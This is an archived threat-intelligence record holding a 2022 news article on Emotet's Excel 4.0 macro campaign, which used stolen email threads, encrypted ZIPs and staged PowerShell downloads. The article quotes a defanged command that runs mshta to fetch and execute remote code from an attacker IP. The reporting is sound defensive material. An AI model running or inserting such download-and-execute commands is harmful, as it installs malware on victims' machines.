{
	"id": "9ea30017-4919-4c2c-ac7f-a383b5b00969",
	"created_at": "2026-04-06T02:12:28.175231Z",
	"updated_at": "2026-04-10T03:20:20.960666Z",
	"deleted_at": null,
	"sha1_hash": "5f7dbc5d99d81740551c91d302d04ba4dd1836e7",
	"title": "Emotet Now Spreading Through Malicious Excel Files",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 79880,
	"plain_text": "Emotet Now Spreading Through Malicious Excel Files\nBy Elizabeth Montalbano\nPublished: 2022-02-16 · Archived: 2026-04-06 01:36:22 UTC\n\nAn ongoing malicious email campaign that includes macro-laden files and multiple layers of obfuscation has been active since late December.\n\nThe infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they wrote in a report published online Tuesday.\n\n“Emotet’s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,” Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector, discovered on Dec. 21 and still active, delivers an Excel file that includes an obfuscated Excel 4.0 macro through socially engineered emails.\n\n“When the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,” researchers wrote.\n\nThe Malware That Won’t Die\n\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion, researchers have said.\n\nThen, Emotet appeared to be put out of commission by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced last November on the back of frequent partner-in-crime TrickBot — and now continues to be a threat.\n\nSince its return, Emotet has used thread hijacking and other types of tactics as part of novel attack methods.\n\nhttps://threatpost.com/emotet-spreading-malicious-excel-files/178444/\nPage 1 of 3\n\n“This technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,” Unit 42 researchers wrote. “The botnet uses this stolen email data to create fake replies impersonating the original senders.”\n\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were reported in December, researchers wrote.\n\nUsing Excel Macros\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n“In some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,” researchers explained. “In other cases, Emotet uses an Excel spreadsheet directly attached to the email.”\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a “new announcement” to a “valuable supplier” and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n“The encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,” researchers wrote. “These macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.”\n\nOnce that’s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n“The code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,” they explained. “The deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.”\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns a text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n“This second-stage PowerShell code…contains 14 URLs to retrieve the Emotet binary,” researchers wrote. “The script attempts each URL until an Emotet binary is successfully downloaded.”\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\nMicrosoft to Block Macros by Default\n\nLast week, Microsoft announced a plan to disable all macros by default in some applications, acknowledging that the mechanism is one of the world’s most popular ways to deliver malware.\n\n“For the protection of our customers, we need to make it more difficult to enable macros in files obtained from the internet,” the computing giant noted. “VBA macros obtained from the internet will now be blocked by default.”\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n“For macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,” Microsoft said. “The default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.”\n\nStarting in late April, instead of a button to “enable macros,” users will be prompted with a “learn more” button that will take them to additional information before they can activate macros within a document.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://threatpost.com/emotet-spreading-malicious-excel-files/178444/"
	],
	"report_names": [
		"178444"
	],
	"threat_actors": [],
	"ts_created_at": 1775441548,
	"ts_updated_at": 1775791220,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f7dbc5d99d81740551c91d302d04ba4dd1836e7.pdf",
		"text": "https://archive.orkl.eu/5f7dbc5d99d81740551c91d302d04ba4dd1836e7.txt",
		"img": "https://archive.orkl.eu/5f7dbc5d99d81740551c91d302d04ba4dd1836e7.jpg"
	}
}